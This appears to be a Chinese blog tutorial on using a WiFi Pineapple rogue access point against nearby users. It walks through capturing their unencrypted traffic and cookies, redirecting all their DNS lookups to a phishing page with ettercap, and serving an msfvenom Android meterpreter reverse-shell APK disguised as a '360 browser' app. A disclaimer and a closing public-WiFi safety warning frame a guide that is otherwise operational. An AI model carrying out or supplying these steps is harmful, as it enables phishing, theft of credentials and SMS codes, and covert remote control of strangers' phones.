文章目录

使用WifiPineApple 进行范围内 局域网钓鱼

由 ssnhy13 发布

使用WifiPineApple 进行范围内 局域网钓鱼

 

作者: W22

 

 

声明:仅供参考,勿用于非法用途,否则后果自负,与作者无关。

 

准备工作:

测试

1.WifiPineApple ,  可以在极客之眼的论坛上买一个汉化的。

2.两张无线网卡(支持监听模式的功能) ,推荐RT3070L,便宜一些 如果有更大需求,可以买功率大一些的。

3.一个USB集线器 ,因为PineApple上只有一个USB接口。

4.KALI Linux 渗透操作系统。

 

 

在进入正题之前,我们需要了解一下WiFiPineApple这个设备:

WifiPineApple 有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的/data/misc/wifi/wpa_supplicant.conf (存放手机记录的热点名称以及密码)文件, 来创建WiFi热点的名称,它创建带密码/不带密码的2种,从而导致,附近的其他用户 只要开启了WiFi ,就会自动连接到你的PineApple上。

 

下边说明实验的步骤:

0x01 连接PineApple: 

 

打开PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。


插入网线或连接建立的热点(一般开机后需要等待2分钟左右),使用web的方式登陆 PineApple的默认连接的地址为:http://172.16.42.1:1471



输入账号密码登陆(厂商提供默认口令)

我们看到以下的界面:



0x02 配置网络(重点):

在左侧的菜单栏中 选择网络



在网络中我们可以看到当前网卡和IP地址获取的情况



我们需要做的配置是:一块网卡用于建立PineAP热点,一块网卡用于桥接其他网络,连接外网。 还有一块网卡用于连接设备物理接口,和默认建立的wifi(不能动)

最终达到这样的效果



0x03 进行一些嗅探和欺骗

PineApple中有很多的插件,都可以进行对连接上的客户机 ,做一些“手脚”,例如图片网址获取的功能 ,他可以获取到用户访问未被SSL加密的图片和一些网址的URL,请求时提交的数据和cookie等。

当然,这些功能在KALI内手动进行实现 ,但是通过这个web的方式一键搭建,是不是很方便呢?



0x04 通过KALI来手动进行dns劫持,并且伪造钓鱼网页

1.启动KALI Linux虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子

菜单栏下的 编辑->虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备(连接PineApple的设备)



2.配置ip地址,或者等待dhcp自动分配

3.可以ping通设备后,我们搭建一个web服务器 : service apache2 start

 

4.将钓鱼页面放置 /var/www/html目录下

 

5.接下来,我们启动ettercap 来进行dns欺骗 :

配置ettercap文件: 

Vim /etc/Ettercap/etter.dns



修改为 所有的域名都指向 172.16.42.133 也就是KALI的地址

6.启动ettercap  Ettercap -G

Ctrl+U启动 网卡选择桥接到PineApple的网卡



管理插件,并将dns欺骗功能启用



7. 这时 用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,

当然,如果想要更好的效果的话 ,可以找一个真实性更好的网页进行测试。



0x05 通过msf生成木马,远控手机或PC。

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.42.133 LPORT=5555 > ~/360浏览器.apk

 

放在钓鱼页面上 ,等待用户“上钩”.  

具体的用法 可以参考这篇文章

附上我的几个成功的例子(在被允许的情况下)



当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。

 

 

0x00 结语

引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的wifi和确定之前连接是安全的wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接(wifi一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了SSL技术进行了加密传输 ,但是还是有相当一部分没有实现这项功能,所以,例如QQ号,还有网络浏览的一些信息以及照片 ,都可能被泄露 ,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!! 例如:下载未知绑定了木马的app  可以被攻击者利用 获取短信信息(验证码),联系人(诈骗),甚至摄像头(威胁),所以要提高安全意识,不要在公共场合轻易的连接wifi,即使是你认为可靠的。

 

本萌新技术水平有限,可能有些地方讲的不详细,希望大佬们可以理解一下 ,欢迎指出错误,随时修正并学习。


0条评论

发表评论

验证码